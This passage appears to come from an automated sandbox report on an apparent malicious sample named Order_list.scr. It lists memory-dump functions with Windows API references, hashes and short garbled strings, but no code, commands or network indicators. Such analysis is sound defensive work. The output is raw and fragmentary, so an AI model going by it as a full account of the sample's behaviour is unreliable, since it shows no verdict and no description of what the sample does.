GetCurrentThread.KERNEL32 ref: 0093D493
GetCurrentProcess.KERNEL32 ref: 0093D4D0
GetCurrentThreadId.KERNEL32 ref: 0093D529

Memory Dump Source

Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Order_list.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d42b28dda39959359a4ff848577641b20fa9c6a9768526a66eafaa5239631b22
Instruction ID: 528b1c40d639d23b524e485df2448a9ca0d7591b2d2f8a8464928e4c25b817a2
Opcode Fuzzy Hash: d42b28dda39959359a4ff848577641b20fa9c6a9768526a66eafaa5239631b22
Instruction Fuzzy Hash: A95136B09013499FDB14DFAAD548B9EBBF1AF48314F208459E019AB3A0D774A984CF65

Function 0093D3D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0093D456
GetCurrentThread.KERNEL32 ref: 0093D493
GetCurrentProcess.KERNEL32 ref: 0093D4D0
GetCurrentThreadId.KERNEL32 ref: 0093D529

Memory Dump Source

Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Order_list.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 77e3b0f426f3223a88fd1740d89563336bd990e27c019afb5960340662690ab6
Instruction ID: d07def21f3f830ce64df118228b1fd93e3a0d7a089f4004e0a1651c03347f21b
Opcode Fuzzy Hash: 77e3b0f426f3223a88fd1740d89563336bd990e27c019afb5960340662690ab6
Instruction Fuzzy Hash: 0E5125B0901309CFDB14DFAAD548B9EBBF5BF88314F208459E419AB3A0D774A984CF65

Function 0093AD48 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0093AF9E

Memory Dump Source

Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Order_list.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 14d25c247f6aecc894f6a4619d82b7bd251802334691ccd744b01ae44593a26d
Instruction ID: 6ccdf2365825e0611890a604aea397ded45db8da314b13338996d3a0c8672590
Opcode Fuzzy Hash: 14d25c247f6aecc894f6a4619d82b7bd251802334691ccd744b01ae44593a26d
Instruction Fuzzy Hash: 83712370A00B058FDB28DF2AD44575ABBF5FF88304F008A29D48ADBA50D775E949CF96

Function 0093590D Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009359C9

Memory Dump Source

Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Order_list.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 531b56781b024167310c303170b445d2e0b4dc84c1dae7021092422078680378
Instruction ID: 978fd1498d0759d109ddfaf48823fdb30346836119b45eae0582e564ad459cbf
Opcode Fuzzy Hash: 531b56781b024167310c303170b445d2e0b4dc84c1dae7021092422078680378
Instruction Fuzzy Hash: FA41B0B0C00619CBDB24CFA9C884BDEBBB5BF49304F24816AD449AB255DB756946CF90

Function 00934248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009359C9

Memory Dump Source

Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Order_list.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4da27dcf09c251ddccdf2bded95b3704b6765fc11b1d9b4c3b3dc3152ae934b6
Instruction ID: 596f054d0e77b601972b984d28a4b7db325172a61d8f76a1bfbbdf7661251a14
Opcode Fuzzy Hash: 4da27dcf09c251ddccdf2bded95b3704b6765fc11b1d9b4c3b3dc3152ae934b6
Instruction Fuzzy Hash: FB41DFB0C00719CBDB24CFA9C884B9EBBF9BF48304F24816AD409AB255DB756985CF90

Function 0093D619 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0093D6A7

Memory Dump Source

Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Order_list.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5c0224866f3003f3f4514a8c2efa40536fe73367e771af9a862fbca8e327d3a8
Instruction ID: 52309b08bda4e052490075e08cd9a8a8ae837996cc77f8279893ac397655a5b9
Opcode Fuzzy Hash: 5c0224866f3003f3f4514a8c2efa40536fe73367e771af9a862fbca8e327d3a8
Instruction Fuzzy Hash: 1221E6B5901259DFDB10CF9AD584ADEFBF4EB48324F14801AE958A7311C374A940CF65

Function 0093D620 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0093D6A7

Memory Dump Source

Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Order_list.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 39addf542341b622f8f6b9d57f3da64766ebe2f669484077b9480da719b5e402
Instruction ID: eac4b7c7b4fa7dff21488b84464f6c65d432b4a3fe0018a4bf796a7f6dd6be46
Opcode Fuzzy Hash: 39addf542341b622f8f6b9d57f3da64766ebe2f669484077b9480da719b5e402
Instruction Fuzzy Hash: 1121E4B59002189FDB10CFAAD584ADEFBF8EB48310F14801AE958A7310C374A940CFA5

Function 0093AF38 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0093AF9E

Memory Dump Source

Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Order_list.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2b1b38e67694affda61af8f9970b0b0a3b4836077b82188da94d71828b169814
Instruction ID: 1cd9ac1e808ef6a7a0e2581fa39538a5bddade122e37d5f38359552b6574cf91
Opcode Fuzzy Hash: 2b1b38e67694affda61af8f9970b0b0a3b4836077b82188da94d71828b169814
Instruction Fuzzy Hash: 1811E0B5C007498FDB10CF9AD544ADEFBF8AB88324F10842AD859A7210C379A545CFA5

Function 008DD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4136871184.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8dd000_Order_list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 509b39dd0b78b4375a37894a113ce7b65791dbf857d2302cf97a83f57f179117
Instruction ID: cbb8ffa94c8cbeebb4be1282baccd179ca6c172da3cfa13083d17b2124e36808
Opcode Fuzzy Hash: 509b39dd0b78b4375a37894a113ce7b65791dbf857d2302cf97a83f57f179117
Instruction Fuzzy Hash: 13212871500304DFDB05DF14D9C0B26BF66FB94324F20C26AD9098B356C336E856C6A1

Function 008ED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137061923.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ed000_Order_list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e786e0b96b3bcdefb41e36a9f8e086f1dffcd74e28347fc6399ece7ccd87c35f
Instruction ID: 4c545bed4f601ea1d26976df8b51f70235ccc3f4dad90b1a8b88dad84f2419e1
Opcode Fuzzy Hash: e786e0b96b3bcdefb41e36a9f8e086f1dffcd74e28347fc6399ece7ccd87c35f
Instruction Fuzzy Hash: DA21F271604784DFCB14DF15D984B26BBA5FB85318F28C569D80A8B296C33AD84BCA61

Function 008ED2BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137061923.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ed000_Order_list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65478f93c15353dc7c934b7596a9f86409357e0ce3ec94651c3dcbc85942ef29
Instruction ID: a184dca4305306c37e1936ad98fa7f9e8e2cdfda0aba4437f1e74041562e6a97
Opcode Fuzzy Hash: 65478f93c15353dc7c934b7596a9f86409357e0ce3ec94651c3dcbc85942ef29
Instruction Fuzzy Hash: 33215B75504384DFDB00DF15D5C0B2AFB65FB85324F24C56DD8498B382D37AD84ACAA2

Function 008ED006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137061923.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ed000_Order_list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 800ac14a21edcc82eddb32aa5a2f8d9aaec8509955ac67b1f4cae810dea4b44a
Instruction ID: dba6c656d7d51d0370f94f229fc2b313db7e77eba9317e2d61f349a6ebd86e97
Opcode Fuzzy Hash: 800ac14a21edcc82eddb32aa5a2f8d9aaec8509955ac67b1f4cae810dea4b44a
Instruction Fuzzy Hash: 49214F755087809FCB02CF14D994711BF71FB56314F28C5EAD8498F2A6C33A985ACB62

Function 008DD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4136871184.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8dd000_Order_list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: ed47b0e984a837c9ca66dda3fac50ceca58a2178c3d4e58500f4c0d98ce95fe4
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 4C11DF72404340DFCB12CF00D5C4B16BF72FB94324F24C2AAD8094B256C33AE85ACBA1

Function 008ED2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137061923.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ed000_Order_list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction ID: 9e355c573f8dd9c9f0cb36b3cc8baa0d2cc88482a45cc2c1f1515d0f3840c979
Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction Fuzzy Hash: D9119075504380CFDB11CF14D5C4B19FB61FB85324F24C6AAD8494B756C33AD80ACB92

Non-executed Functions

Function 0093D304 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137386551.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Order_list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1efe08a9fc84bb7d4849bc236cd48ea95214d1679eecd13abd50f7a7810f41
Instruction ID: a07fff05e9f0521bea9e48ea24adb94ee4fe5b2c32c3000fd18dcee70d02f54d
Opcode Fuzzy Hash: 2a1efe08a9fc84bb7d4849bc236cd48ea95214d1679eecd13abd50f7a7810f41
Instruction Fuzzy Hash: 8EA19036E002098FCF19DFB5C8505AEBBB6FF85300B15457AE806AB262DB31E916CF40

Analysis Process: powershell.exePID: 7048, Parent PID: 6984COMMON

Executed Functions

Function 048F6CC3 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1700196729.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_48f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1be81fc4653e918a8d9861a1d2241aecd1c577c947c19538afd455d1d57cff0b
Instruction ID: fe6e866896b62afd77ae4f776c1ac3ecbc206b2be81f61aaadc23eb3d311ed29
Opcode Fuzzy Hash: 1be81fc4653e918a8d9861a1d2241aecd1c577c947c19538afd455d1d57cff0b
Instruction Fuzzy Hash: 9641A434A05248DFCB05DFA4D8809ADFBB2FF89300F2585A5E544AB362D735AD46DB50

Function 048F29F0 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1700196729.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_48f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc9328db78b1732a6fabceaa9d408392b8ed8de7e0bbc32c0d2e4d4f06f9422e
Instruction ID: 9d899f4f049bfd46414a7741ba0906666e6ab147d495bba8ad4222475157a705
Opcode Fuzzy Hash: fc9328db78b1732a6fabceaa9d408392b8ed8de7e0bbc32c0d2e4d4f06f9422e
Instruction Fuzzy Hash: 6F916B74A002458FCB15CF58C8989AAFBB1FF48310B248A99D915EB365D736FC91CBA0

Function 048F2B00 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1700196729.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_48f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fd790a36ef1039221789e7031d652e0485b8e275034af23192745364992fc2e
Instruction ID: e4641da421929c2abfef33032ab15beb63459195ebf68005ac8fbdba64b29c79
Opcode Fuzzy Hash: 7fd790a36ef1039221789e7031d652e0485b8e275034af23192745364992fc2e
Instruction Fuzzy Hash: 43412AB4A006059FCB05CF58C9989AAFBB1FF48310B158A99D915AB369C736FC51CFA0

Function 0306D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1699744980.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_306d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfb3b82bd5dac6ff74abcdee7de046ee81cc9e1480715a5fb8410e4f3c9001ab
Instruction ID: 0ebbab4663dca8e29ed534361e8924bd6b8a50c50076c8a8e0d9f969eebcda6b
Opcode Fuzzy Hash: cfb3b82bd5dac6ff74abcdee7de046ee81cc9e1480715a5fb8410e4f3c9001ab
Instruction Fuzzy Hash: 5401216110E3C05ED7128B25C894B52BFB8EF43224F1D81CBD8848F197C2699844D772

Function 0306D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1699744980.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_306d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d8870d235441b8145cd6909f1f0a6ca9686bbbaaa7a79284c332ce5cb6270c
Instruction ID: bf20a5e070e75f422c47bd8d032f4cbf3a46c1164daf7af5baab99f2dac50f1c
Opcode Fuzzy Hash: a3d8870d235441b8145cd6909f1f0a6ca9686bbbaaa7a79284c332ce5cb6270c
Instruction Fuzzy Hash: 4201F73120A7409AF710CA25C984B6BFFDCEF41324F1CC46AED080A24AC279D841C6B1

Analysis Process: Order_list.scr.exePID: 3584, Parent PID: 6984COMMON

Executed Functions

Function 0167B328 Relevance: 6.6, Strings: 5, Instructions: 346COMMON

Download Yara Rule

Strings

LjAp, xrefs: 0167B6E5
PH^q, xrefs: 0167B758
0oAp, xrefs: 0167B562
LjAp, xrefs: 0167B6CF
PH^q, xrefs: 0167B747

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 9c541728c3ab31949ff5981520a4c4fad42f7a41d34f07aa4bf6af7e2593ad04
Instruction ID: e19c5dd5e715eb2582fa3edb2100f1a4be994ffd7f5a3ba2d75d987661885eb8
Opcode Fuzzy Hash: 9c541728c3ab31949ff5981520a4c4fad42f7a41d34f07aa4bf6af7e2593ad04
Instruction Fuzzy Hash: 91E1E975E01219CFDB14CFA9D984A9DBBB2FF48310F158069E919AB365DB30AD81CF50

Function 0167C190 Relevance: 6.4, Strings: 5, Instructions: 192COMMON

Download Yara Rule

Strings

0oAp, xrefs: 0167C202
PH^q, xrefs: 0167C3F8
LjAp, xrefs: 0167C385
LjAp, xrefs: 0167C36F
PH^q, xrefs: 0167C3E7

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 18ccf44aaa45d8d3f77fb73f9dc94887ef5e54805eb627d90d5fb472c69d11ac
Instruction ID: b72cb40b764fa30cdec794f9231fa734a7921023c51d8367acb2ab76c074778b
Opcode Fuzzy Hash: 18ccf44aaa45d8d3f77fb73f9dc94887ef5e54805eb627d90d5fb472c69d11ac
Instruction Fuzzy Hash: E481C474E00209DFDB54DFAAD984A9DBBF2BF88310F14C069E819AB365DB349985CF50

Function 0167C753 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

0oAp, xrefs: 0167C7C2
LjAp, xrefs: 0167C92F
PH^q, xrefs: 0167C9A7
LjAp, xrefs: 0167C945
PH^q, xrefs: 0167C9B8

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: a298f0d7f07884bb717be4927b6f8020ebd5cdd0693d7dced51a3167dc79cb4f
Instruction ID: 48ca36f8c5e9073715494ed7552d47fd832ad5eb1410680fe74f1ccff6d88537
Opcode Fuzzy Hash: a298f0d7f07884bb717be4927b6f8020ebd5cdd0693d7dced51a3167dc79cb4f
Instruction Fuzzy Hash: FE81C374E00219DFDB58DFAAD984A9DBBF2BF88300F148069E419AB365DB349985CF50

Function 01674AD9 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

LjAp, xrefs: 01674CB8
PH^q, xrefs: 01674D30
LjAp, xrefs: 01674CCE
PH^q, xrefs: 01674D41
0oAp, xrefs: 01674B4A

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: a2617222a4d571cb5673354200899897ff728c6d501c6a146643a9a12de85f8c
Instruction ID: ab3e7673c51a10f925757fd4633c9cc584ba70b60405243b46404130a60fad17
Opcode Fuzzy Hash: a2617222a4d571cb5673354200899897ff728c6d501c6a146643a9a12de85f8c
Instruction Fuzzy Hash: 14819374E00218DFDB58CFA9D988A9DBBF2BF88300F14C069E419AB365DB359985CF50

Function 0167C470 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0167C6D8
PH^q, xrefs: 0167C6C7
0oAp, xrefs: 0167C4E2
LjAp, xrefs: 0167C64F
LjAp, xrefs: 0167C665

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 6dd603f4208e14d528547c40b7ab1f3e66f109e1157978938719c1a7fd04e7b6
Instruction ID: a5ee1e3648835176b74227c376de5cadba9347f55e12879382eac77194f02333
Opcode Fuzzy Hash: 6dd603f4208e14d528547c40b7ab1f3e66f109e1157978938719c1a7fd04e7b6
Instruction Fuzzy Hash: E581B574E00219CFDB14DFAAD984A9DBBF2BF88300F14D069E419AB365DB35A945CF50

Function 0167BBD3 Relevance: 6.4, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

LjAp, xrefs: 0167BDC5
PH^q, xrefs: 0167BE27
PH^q, xrefs: 0167BE38
0oAp, xrefs: 0167BC42
LjAp, xrefs: 0167BDAF

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 065cfb1c213eef625eeb98fac1ff1fee785e2a84b3fd33e8a6930269a2a68695
Instruction ID: 00c2583f1f6c21a93889cc4cb7d9b69bc5a42da47a3b6eee2e6803922bdaeeac
Opcode Fuzzy Hash: 065cfb1c213eef625eeb98fac1ff1fee785e2a84b3fd33e8a6930269a2a68695
Instruction Fuzzy Hash: 4D81A274E00218DFDB18DFAAD984A9DBBF2BF89300F14C069E419AB365DB349985CF51

Function 0167CA33 Relevance: 6.4, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0167CC98
LjAp, xrefs: 0167CC25
0oAp, xrefs: 0167CAA2
PH^q, xrefs: 0167CC87
LjAp, xrefs: 0167CC0F

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 362d5762befe6c27da71d2db8c9e86595595ee6492636b05d3c65f98f1584a94
Instruction ID: e2695ab697ce9120b0bd8237c97710f2020b022d375165a684c889f74294871d
Opcode Fuzzy Hash: 362d5762befe6c27da71d2db8c9e86595595ee6492636b05d3c65f98f1584a94
Instruction Fuzzy Hash: 0D81A474E00219CFDB14DFAAD984A9DBBF2BF88300F14C069E819AB365DB349985CF50

Function 0167BEB7 Relevance: 6.4, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

0oAp, xrefs: 0167BF22
LjAp, xrefs: 0167C0A5
PH^q, xrefs: 0167C107
LjAp, xrefs: 0167C08F
PH^q, xrefs: 0167C118

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 7abb3c1423ae0927917455fec70d0d6e6befd3b287bfd082979d943e5292deec
Instruction ID: a6426f2ad8c9fee8a537caae5f68dd2c2dadbc4900970ba22300889167ec853c
Opcode Fuzzy Hash: 7abb3c1423ae0927917455fec70d0d6e6befd3b287bfd082979d943e5292deec
Instruction Fuzzy Hash: 8081A474E00219CFDB18DFAAD984A9DBBF2BF89300F14C069E419AB365DB359985CF50

Function 01676880 Relevance: 5.3, Strings: 4, Instructions: 334COMMON

Download Yara Rule

Strings

(o^q, xrefs: 01676988
(o^q, xrefs: 0167697A
,bq, xrefs: 01676A00
,bq, xrefs: 016769F2

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 6310095f24315d43348dcf2dd95660f557e1a1f939e004d67734bd664e4f6911
Instruction ID: f5324887b435616540fa957eac711ca58cf4a4a3c61ca4606ea33210d8c1f88f
Opcode Fuzzy Hash: 6310095f24315d43348dcf2dd95660f557e1a1f939e004d67734bd664e4f6911
Instruction Fuzzy Hash: EAD14870A00619DFEB15CFA9CD84AADBBB6FF89304F148069E905AB3A5D730E951CF50

Function 0167B4F3 Relevance: 3.9, Strings: 3, Instructions: 152COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0167B758
0oAp, xrefs: 0167B562
PH^q, xrefs: 0167B747

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: 0oAp$PH^q$PH^q
API String ID: 0-4194141968
Opcode ID: 0b4c32cd32cc0cb1cfdc65cbd5889264d36941f4d167749ceaadd28fa8a7fc08
Instruction ID: b441861c6945e0ac06efcb8cfa8aca2fdcda246ef5df43e4e64a4f06d243e6ee
Opcode Fuzzy Hash: 0b4c32cd32cc0cb1cfdc65cbd5889264d36941f4d167749ceaadd28fa8a7fc08
Instruction Fuzzy Hash: 98619F74E006189FDB18DFAAD984A9DFBF2FF88300F148069E519AB365EB349945CF50

Function 01679858 Relevance: 3.4, Strings: 2, Instructions: 850COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0167A273
(o^q, xrefs: 01679C78

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: d7fbb8c1ef155c43df51fee0499f093d712eda19328430d311ef081f79d32ebd
Instruction ID: 0607ec8c2abdfe59d5b40bb4b2de82b74557338db4b2bc8e20963bf901fb9613
Opcode Fuzzy Hash: d7fbb8c1ef155c43df51fee0499f093d712eda19328430d311ef081f79d32ebd
Instruction Fuzzy Hash: 9772BF71A00209DFDB15CFA8DD84AAEBBF2FF88315F198559E8059B3A5D730E981CB50

Function 01676108 Relevance: 3.0, Strings: 2, Instructions: 508COMMON

Download Yara Rule

Strings

Hbq, xrefs: 0167650E
(o^q, xrefs: 01676642

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: fb0944f89aed50c0c5cf69fc9b1ac65fc89377aed9eac2ad1c5ba2a3c7516bc6
Instruction ID: bdff0cebef2b0eda0212b25678fc4df2c9baf4e56a9e698af4486e9586d408fb
Opcode Fuzzy Hash: fb0944f89aed50c0c5cf69fc9b1ac65fc89377aed9eac2ad1c5ba2a3c7516bc6
Instruction Fuzzy Hash: 3F12AE70A006199FDB14DF69CC94AAEBBF6FF88304F148569E505EB395EB309C46CB90

Function 05DA8B58 Relevance: 2.7, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

PH^q, xrefs: 05DA8E9A
PH^q, xrefs: 05DA8EAB

Memory Dump Source

Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false

